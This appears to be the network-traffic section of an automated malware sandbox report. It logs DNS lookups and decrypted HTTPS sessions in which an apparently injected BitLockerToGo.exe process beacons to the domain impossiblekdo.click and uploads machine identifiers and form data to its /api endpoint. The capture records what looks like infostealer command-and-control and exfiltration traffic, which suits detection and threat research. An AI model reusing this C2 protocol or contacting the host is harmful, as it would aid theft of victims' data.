Jan 5, 2025 19:42:38.008197069 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.008223057 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.008318901 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.008660078 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.008671999 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.473937988 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.474067926 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.477396011 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.477406025 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.477610111 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.479224920 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.480221033 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.480256081 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.480369091 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.480396986 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.480514050 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.480536938 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.480667114 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.480695963 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.480865955 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.480891943 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.481079102 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.481110096 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.481117964 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.481292963 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.481328964 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.490298986 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.490520000 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.490544081 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.490569115 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.490591049 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.490708113 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.490739107 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.495021105 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:38.495199919 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:38.495227098 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:41.286748886 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:41.286834955 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:41.286978006 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:41.287066936 CET	49841	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:41.287090063 CET	443	49841	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:41.322257042 CET	49862	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:41.322293043 CET	443	49862	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:41.322372913 CET	49862	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:41.322685003 CET	49862	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:41.322700024 CET	443	49862	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:41.744354963 CET	49862	443	192.168.2.5	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:42:29.782326937 CET	62087	53	192.168.2.5	1.1.1.1
Jan 5, 2025 19:42:29.807235003 CET	53	62087	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 19:42:29.782326937 CET	192.168.2.5	1.1.1.1	0x770b	Standard query (0)	impossiblekdo.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 19:42:29.807235003 CET	1.1.1.1	192.168.2.5	0x770b	No error (0)	impossiblekdo.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:42:29.807235003 CET	1.1.1.1	192.168.2.5	0x770b	No error (0)	impossiblekdo.click		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

impossiblekdo.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49785	188.114.97.3	443	6204	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:42:30 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: impossiblekdo.click
2025-01-05 18:42:30 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 18:42:31 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=90e82hcsq09u51mkdquopudda4; expires=Thu, 01 May 2025 12:29:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ib192DUQHPey5n%2Ff8oZT%2BXvZmx%2BWdrP4BROx7kFUWWxdbqPxG8bweaZyDB9j6GDpcVVE0rmJI4oQNaxJyNEserWuC0ALWJXTqKvAyQjSXp%2Fp%2BGPSufxHPDPS11JOgd%2FAmISsPEnW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59bce8aed4381-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2286&min_rtt=2278&rtt_var=870&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1245733&cwnd=211&unsent_bytes=0&cid=2ec5585f6b104b4d&ts=920&x=0"
2025-01-05 18:42:31 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 18:42:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49795	188.114.97.3	443	6204	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:42:31 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: impossiblekdo.click
2025-01-05 18:42:31 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--jqmircmzqpgf&j=
2025-01-05 18:42:32 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ac9a8qtfd62fihh4v79d1hqv7s; expires=Thu, 01 May 2025 12:29:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXZJBZXqLfIqWf1cn%2FUfSnuuy%2FpGmHbwa0%2BV66ASMST0DC%2B2NLZTtHmMA6EOLrEkCJ4wIUQyzfS6ZnME%2B%2FXoa4UavM5BMv7kvUU26%2BCbmYquoQvm3coO2UKvtR5XMGcZCeyks0mu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59bd48b69efa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2013&rtt_var=761&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=957&delivery_rate=1432074&cwnd=191&unsent_bytes=0&cid=0556e365f19e0102&ts=496&x=0"
2025-01-05 18:42:32 UTC	236	IN	Data Raw: 31 34 38 63 0d 0a 4b 2f 2b 47 50 4b 4d 36 38 51 66 75 43 46 34 45 46 48 58 43 53 56 49 78 50 36 67 62 4d 41 2f 76 70 73 57 64 55 69 41 45 45 70 46 51 33 66 41 65 6d 51 37 64 4a 5a 31 74 66 44 35 67 42 37 63 73 66 68 4e 65 7a 44 6b 4b 61 59 37 4b 74 76 68 2b 41 6e 4a 2f 73 78 47 5a 35 31 44 51 58 39 30 6c 69 33 42 38 50 6b 38 4f 34 43 77 38 45 77 57 4b 66 6c 70 74 6a 73 71 6e 2f 44 6c 50 64 48 37 79 51 35 50 68 56 4d 5a 5a 6c 57 61 43 5a 54 74 68 63 52 53 6f 4a 7a 74 63 56 38 55 35 48 43 32 4b 33 4f 65 6e 63 47 31 68 5a 76 42 6d 6e 76 56 58 67 55 66 64 66 4d 78 74 4d 43 59 75 56 36 4d 73 4d 46 31 5a 7a 48 42 59 5a 34 66 43 70 76 6b 34 55 47 31 30 2b 55 4f 64 34 6c 58 4d 55 49 46 72 69 47 49 77 5a 33 Data Ascii: 148cK/+GPKM68QfuCF4EFHXCSVIxP6gbMA/vpsWdUiAEEpFQ3fAemQ7dJZ1tfD5gB7csfhNezDkKaY7Ktvh+AnJ/sxGZ51DQX90li3B8Pk8O4Cw8EwWKflptjsqn/DlPdH7yQ5PhVMZZlWaCZTthcRSoJztcV8U5HC2K3OencG1hZvBmnvVXgUfdfMxtMCYuV6MsMF1ZzHBYZ4fCpvk4UG10+UOd4lXMUIFriGIwZ3
2025-01-05 18:42:32 UTC	1369	IN	Data Raw: 73 55 34 47 56 77 56 45 57 4b 49 52 49 2b 76 38 65 32 37 69 56 50 64 6e 61 7a 56 74 50 39 48 73 5a 55 30 7a 33 4d 59 6a 42 6f 63 78 53 76 4c 44 46 54 54 38 56 35 55 57 57 46 77 4b 33 77 50 30 31 6f 65 76 52 42 6c 4f 4e 52 78 6c 43 56 61 6f 38 71 63 69 5a 78 44 2b 42 7a 63 48 4e 4e 79 58 70 47 59 4a 79 45 75 4c 45 70 41 6d 46 38 73 78 48 64 34 6c 44 41 56 5a 4e 33 68 47 45 33 59 32 51 63 71 53 59 39 55 31 44 41 64 6c 46 74 69 73 36 74 38 44 70 47 61 33 33 31 53 5a 32 6b 45 49 46 66 69 79 58 55 4b 68 39 6a 5a 68 43 73 50 58 4a 70 48 64 55 33 53 79 32 4b 79 4f 65 6e 63 45 70 6a 63 2f 42 43 6b 75 64 57 79 6b 71 54 64 34 70 6e 4f 58 52 77 45 71 34 68 4d 30 46 58 78 48 39 52 5a 49 62 4e 6f 76 67 30 41 69 67 77 39 46 48 64 76 42 37 67 56 5a 68 70 68 6e 30 38 4a Data Ascii: sU4GVwVEWKIRI+v8e27iVPdnazVtP9HsZU0z3MYjBocxSvLDFTT8V5UWWFwK3wP01oevRBlONRxlCVao8qciZxD+BzcHNNyXpGYJyEuLEpAmF8sxHd4lDAVZN3hGE3Y2QcqSY9U1DAdlFtis6t8DpGa331SZ2kEIFfiyXUKh9jZhCsPXJpHdU3Sy2KyOencEpjc/BCkudWykqTd4pnOXRwEq4hM0FXxH9RZIbNovg0Aigw9FHdvB7gVZhphn08J
2025-01-05 18:42:32 UTC	1369	IN	Data Raw: 72 50 45 46 52 77 48 39 64 59 49 47 45 36 62 38 33 57 69 59 6f 73 32 4f 65 38 46 33 4c 47 71 5a 6d 67 6d 51 37 63 44 59 49 37 6a 4a 77 56 46 47 4b 49 52 4a 67 6a 4d 79 68 37 54 39 50 5a 58 37 39 52 70 6a 72 56 73 46 59 6e 6d 43 49 59 54 64 6c 65 78 4f 79 49 54 42 62 57 4d 74 7a 57 43 33 44 68 4b 44 6e 63 42 6f 6d 51 65 52 43 33 39 46 64 7a 31 61 55 63 38 78 31 63 6e 38 32 45 4b 78 72 61 42 4e 51 77 6e 78 58 59 6f 7a 4f 71 66 6f 36 54 6d 35 2b 38 46 75 53 34 46 37 4e 55 4a 6c 6f 67 6d 34 30 62 33 30 63 70 69 73 78 57 52 32 45 4f 56 56 31 7a 5a 7a 6e 79 7a 64 4f 61 33 2b 78 66 4a 37 71 55 4d 5a 4f 30 33 72 43 63 33 78 68 65 6c 66 34 61 7a 78 61 58 63 46 7a 56 6d 32 4b 79 61 4c 38 4e 30 46 72 64 2f 6c 48 6d 75 42 53 79 46 57 56 5a 59 74 75 4f 58 52 7a 48 71 Data Ascii: rPEFRwH9dYIGE6b83WiYos2Oe8F3LGqZmgmQ7cDYI7jJwVFGKIRJgjMyh7T9PZX79RpjrVsFYnmCIYTdlexOyITBbWMtzWC3DhKDncBomQeRC39Fdz1aUc8x1cn82EKxraBNQwnxXYozOqfo6Tm5+8FuS4F7NUJlogm40b30cpisxWR2EOVV1zZznyzdOa3+xfJ7qUMZO03rCc3xhelf4azxaXcFzVm2KyaL8N0Frd/lHmuBSyFWVZYtuOXRzHq
2025-01-05 18:42:32 UTC	1369	IN	Data Raw: 55 39 77 35 54 53 4f 55 68 4b 44 7a 63 42 6f 6d 65 66 70 62 6b 2b 70 58 7a 46 36 62 59 6f 4a 6e 4e 32 42 39 45 4b 63 74 50 56 74 51 7a 33 70 54 61 59 66 57 70 50 51 36 54 32 77 77 76 51 6d 61 2f 42 36 5a 47 4c 52 70 70 58 6f 6e 64 47 42 58 76 32 55 70 45 31 72 47 4f 51 6f 74 6a 73 75 75 38 44 68 4b 61 58 2f 33 52 35 76 69 55 38 52 58 6d 58 65 45 5a 44 46 74 65 52 79 79 4b 7a 31 58 55 63 35 78 57 57 66 4e 69 75 66 34 4b 41 49 2b 4d 4d 5a 45 6b 75 52 64 31 78 69 4d 4b 35 55 71 4f 32 6f 32 54 2b 41 6e 50 6c 4e 53 78 6e 56 5a 5a 59 7a 49 71 66 67 31 53 32 35 34 34 55 69 5a 37 46 2f 50 56 35 4a 68 69 57 38 34 59 58 49 52 72 32 74 2b 45 31 72 53 4f 51 6f 74 6f 75 4f 53 76 52 46 34 4a 6d 2b 39 55 4e 33 6a 55 6f 45 41 30 32 6d 50 5a 6a 52 70 63 42 36 73 49 54 6c Data Ascii: U9w5TSOUhKDzcBomefpbk+pXzF6bYoJnN2B9EKctPVtQz3pTaYfWpPQ6T2wwvQma/B6ZGLRppXondGBXv2UpE1rGOQotjsuu8DhKaX/3R5viU8RXmXeEZDFteRyyKz1XUc5xWWfNiuf4KAI+MMZEkuRd1xiMK5UqO2o2T+AnPlNSxnVZZYzIqfg1S2544UiZ7F/PV5JhiW84YXIRr2t+E1rSOQotouOSvRF4Jm+9UN3jUoEA02mPZjRpcB6sITl
2025-01-05 18:42:32 UTC	925	IN	Data Raw: 6c 5a 75 69 63 47 6f 2f 6a 46 45 64 48 66 36 57 35 50 70 55 63 6c 51 6d 6d 53 49 62 7a 46 67 65 68 32 68 4c 44 35 64 56 59 6f 33 45 6d 71 56 68 50 2b 2f 45 56 4a 39 59 75 56 45 76 4f 6c 52 67 55 66 64 66 4d 78 74 4d 43 59 75 56 36 6b 35 4e 46 35 50 77 33 35 63 59 6f 37 57 70 76 49 37 55 47 46 2f 39 30 36 52 34 6c 48 48 57 5a 5a 76 67 47 30 35 62 58 6b 62 34 47 56 77 56 45 57 4b 49 52 4a 44 68 74 65 77 2f 44 35 4a 63 47 75 7a 56 74 50 39 48 73 5a 55 30 7a 33 4d 61 54 64 74 63 68 65 73 4b 7a 52 65 58 64 68 32 56 57 71 45 7a 37 58 31 4e 30 56 74 65 50 68 47 6d 2f 5a 53 7a 30 71 57 64 35 34 71 63 69 5a 78 44 2b 42 7a 63 47 56 61 32 6d 6c 52 4c 37 7a 53 70 4f 6b 37 54 32 6f 77 37 41 65 45 70 46 6e 4e 47 4d 73 6c 69 6d 55 31 5a 58 6b 57 71 53 63 39 56 6c 54 50 Data Ascii: lZuicGo/jFEdHf6W5PpUclQmmSIbzFgeh2hLD5dVYo3EmqVhP+/EVJ9YuVEvOlRgUfdfMxtMCYuV6k5NF5Pw35cYo7WpvI7UGF/906R4lHHWZZvgG05bXkb4GVwVEWKIRJDhtew/D5JcGuzVtP9HsZU0z3MaTdtchesKzReXdh2VWqEz7X1N0VtePhGm/ZSz0qWd54qciZxD+BzcGVa2mlRL7zSpOk7T2ow7AeEpFnNGMslimU1ZXkWqSc9VlTP
2025-01-05 18:42:32 UTC	1369	IN	Data Raw: 33 35 30 38 0d 0a 59 7a 70 74 64 52 32 76 4c 44 5a 58 58 63 46 2b 58 47 75 49 7a 36 36 2f 66 67 4a 68 61 4c 4d 52 33 63 4a 39 30 30 71 68 61 34 39 78 66 48 6b 34 44 75 41 73 50 42 4d 46 69 6e 4a 61 59 70 2f 42 72 76 63 30 53 32 5a 30 2b 55 53 61 35 46 76 4d 58 5a 64 72 69 47 30 38 61 6e 6b 51 71 43 51 30 55 31 4b 4b 4e 78 4a 71 6c 59 54 2f 76 78 42 4a 63 46 48 39 51 6f 2b 6b 51 59 39 42 30 32 4b 41 4b 6d 51 6d 65 42 36 68 49 7a 35 66 56 63 35 72 55 6d 61 45 79 36 62 77 4d 45 46 6e 65 76 74 62 6d 2b 52 56 79 56 2b 62 59 59 4a 34 50 57 6b 32 57 65 41 73 4b 42 4d 46 69 6b 68 45 61 6f 72 4c 35 64 59 33 57 57 64 36 38 45 4b 52 70 45 47 50 51 64 4e 69 67 43 70 6b 4a 6e 73 62 72 53 38 69 58 31 33 4b 63 46 56 6e 6e 38 75 6f 38 6a 4e 43 59 32 4c 79 57 35 4c 76 57 Data Ascii: 3508YzptdR2vLDZXXcF+XGuIz66/fgJhaLMR3cJ900qha49xfHk4DuAsPBMFinJaYp/Brvc0S2Z0+USa5FvMXZdriG08ankQqCQ0U1KKNxJqlYT/vxBJcFH9Qo+kQY9B02KAKmQmeB6hIz5fVc5rUmaEy6bwMEFnevtbm+RVyV+bYYJ4PWk2WeAsKBMFikhEaorL5dY3WWd68EKRpEGPQdNigCpkJnsbrS8iX13KcFVnn8uo8jNCY2LyW5LvW
2025-01-05 18:42:32 UTC	1369	IN	Data Raw: 75 6e 6d 45 75 62 58 34 55 72 69 4d 35 55 31 50 4b 65 46 39 74 7a 59 72 6e 2b 43 67 43 50 6a 44 57 61 6f 72 79 56 49 4e 37 68 48 4f 47 62 54 42 77 66 52 61 6a 50 54 31 44 48 59 51 35 51 32 71 63 68 50 2f 70 49 46 56 68 62 37 31 51 33 65 4e 53 67 51 44 54 62 6f 4e 6b 4d 57 31 79 48 71 55 6a 4d 31 5a 59 77 48 56 65 62 49 58 4e 72 66 6f 31 52 47 78 7a 2f 55 61 63 36 46 72 49 56 70 6f 6c 77 69 6f 37 66 6a 5a 50 34 42 30 67 56 45 58 48 61 52 42 66 6a 74 57 32 36 6a 31 53 59 44 4c 63 53 70 48 6e 57 38 5a 49 30 33 72 43 63 33 78 68 65 6c 66 34 61 7a 42 58 55 63 6c 2b 58 47 4b 41 79 36 44 30 50 30 68 6f 59 76 78 4d 6c 65 68 57 7a 45 71 5a 62 35 35 6a 4e 57 74 34 48 37 49 6f 63 42 30 64 7a 57 45 53 4e 63 33 32 72 66 77 38 56 47 74 2f 73 31 62 54 2f 52 37 47 56 4e Data Ascii: unmEubX4UriM5U1PKeF9tzYrn+CgCPjDWaoryVIN7hHOGbTBwfRajPT1DHYQ5Q2qchP/pIFVhb71Q3eNSgQDTboNkMW1yHqUjM1ZYwHVebIXNrfo1RGxz/Uac6FrIVpolwio7fjZP4B0gVEXHaRBfjtW26j1SYDLcSpHnW8ZI03rCc3xhelf4azBXUcl+XGKAy6D0P0hoYvxMlehWzEqZb55jNWt4H7IocB0dzWESNc32rfw8VGt/s1bT/R7GVN
2025-01-05 18:42:32 UTC	1369	IN	Data Raw: 63 55 64 37 48 4b 77 6d 50 31 67 64 68 44 6c 55 4c 64 57 55 36 62 38 30 55 79 59 6f 6f 78 76 47 73 51 32 57 43 4d 46 36 77 6e 4e 38 63 44 5a 50 38 6d 56 77 51 52 32 53 4f 52 56 75 6e 39 61 68 2f 43 5a 42 49 55 37 4e 61 6f 72 79 56 4e 6f 61 74 57 4b 64 59 79 70 72 5a 43 6d 65 42 54 31 53 58 73 51 37 59 33 75 41 31 4b 54 36 4e 33 78 59 66 76 52 64 6d 75 70 59 77 52 6a 64 4a 59 4d 71 5a 46 38 32 58 2b 41 55 66 68 4e 46 69 69 45 53 57 49 37 4b 71 66 67 6d 55 79 74 54 35 46 2b 58 2f 78 7a 6e 58 34 4a 73 6d 6d 63 75 4a 6a 68 58 70 6d 74 6f 41 78 4f 4b 66 55 4d 74 31 5a 54 31 70 47 55 52 4d 53 43 68 56 74 50 39 48 74 63 59 79 7a 66 43 4b 69 34 6d 4c 6c 66 6e 4b 43 4a 42 57 38 6c 76 55 53 71 7a 2b 6f 66 30 4a 6b 4e 72 65 2f 39 33 6f 2f 46 64 7a 31 61 55 63 35 30 Data Ascii: cUd7HKwmP1gdhDlULdWU6b80UyYooxvGsQ2WCMF6wnN8cDZP8mVwQR2SORVun9ah/CZBIU7NaoryVNoatWKdYyprZCmeBT1SXsQ7Y3uA1KT6N3xYfvRdmupYwRjdJYMqZF82X+AUfhNFiiESWI7KqfgmUytT5F+X/xznX4JsmmcuJjhXpmtoAxOKfUMt1ZT1pGURMSChVtP9HtcYyzfCKi4mLlfnKCJBW8lvUSqz+of0JkNre/93o/Fdz1aUc50
2025-01-05 18:42:32 UTC	1369	IN	Data Raw: 6b 58 75 61 79 49 54 42 59 6f 2b 55 58 2b 66 77 71 54 70 4d 77 56 59 54 73 5a 4b 6b 2b 70 5a 31 32 32 51 64 49 39 71 4e 31 68 49 4e 71 34 67 4e 31 39 4c 39 45 64 6e 62 6f 50 4b 6f 4f 6b 68 41 69 67 77 2f 41 6e 46 33 52 36 4a 47 4b 77 72 7a 48 4a 38 50 6a 59 69 6f 79 55 2b 56 45 76 62 4e 47 64 75 6e 4d 65 6e 39 48 41 4d 4a 6e 61 7a 45 63 2b 71 48 73 56 4a 30 7a 33 63 4f 47 63 7a 4a 55 44 77 65 53 38 64 52 49 70 76 45 6a 58 66 69 75 66 74 63 42 6f 6d 4e 2f 42 62 6a 2b 4a 64 31 31 76 55 57 37 4a 4d 50 32 46 77 46 4b 34 38 49 52 46 79 79 58 4a 65 59 59 72 53 6d 63 45 6c 51 57 68 2b 39 46 2b 4d 70 42 43 42 56 39 4d 39 74 53 6f 74 62 48 46 62 36 47 63 68 51 46 50 42 62 31 55 74 73 6f 72 6e 35 33 41 61 4a 6b 58 77 52 35 50 6a 53 4e 41 56 74 57 61 4c 62 44 39 6f Data Ascii: kXuayITBYo+UX+fwqTpMwVYTsZKk+pZ122QdI9qN1hINq4gN19L9EdnboPKoOkhAigw/AnF3R6JGKwrzHJ8PjYioyU+VEvbNGdunMen9HAMJnazEc+qHsVJ0z3cOGczJUDweS8dRIpvEjXfiuftcBomN/Bbj+Jd11vUW7JMP2FwFK48IRFyyXJeYYrSmcElQWh+9F+MpBCBV9M9tSotbHFb6GchQFPBb1Utsorn53AaJkXwR5PjSNAVtWaLbD9o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49804	188.114.97.3	443	6204	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:42:32 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NF6WBP6EQRJE0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12812 Host: impossiblekdo.click
2025-01-05 18:42:32 UTC	12812	OUT	Data Raw: 2d 2d 4e 46 36 57 42 50 36 45 51 52 4a 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 31 37 37 36 44 34 36 39 38 32 34 44 41 33 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 4e 46 36 57 42 50 36 45 51 52 4a 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 46 36 57 42 50 36 45 51 52 4a 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 4e 46 36 57 Data Ascii: --NF6WBP6EQRJE0Content-Disposition: form-data; name="hwid"6A1776D469824DA3889EEA882476AC8E--NF6WBP6EQRJE0Content-Disposition: form-data; name="pid"2--NF6WBP6EQRJE0Content-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--NF6W
2025-01-05 18:42:33 UTC	1128	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=obcqjur4q88b7s65m8u8tjbaql; expires=Thu, 01 May 2025 12:29:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7SXUDDElmmr6qO0k8rbP%2Fao3sAzgyThFMl0Z1IfhMnzLBX2%2BWdGn%2BhNeT5WaQcaC11a1GROUBUqK7QKWTSQXHlHxdvHCpgfSIq8rqBMjy7kZjS66NYyaXOboYgy1o572DA6RkqKP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59bdbfa9f4391-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1593&rtt_var=614&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2848&recv_bytes=13750&delivery_rate=1759036&cwnd=237&unsent_bytes=0&cid=324d284bb5067214&ts=571&x=0"
2025-01-05 18:42:33 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:42:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49812	188.114.97.3	443	6204	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:42:34 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JEN5G7VEOK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15036 Host: impossiblekdo.click
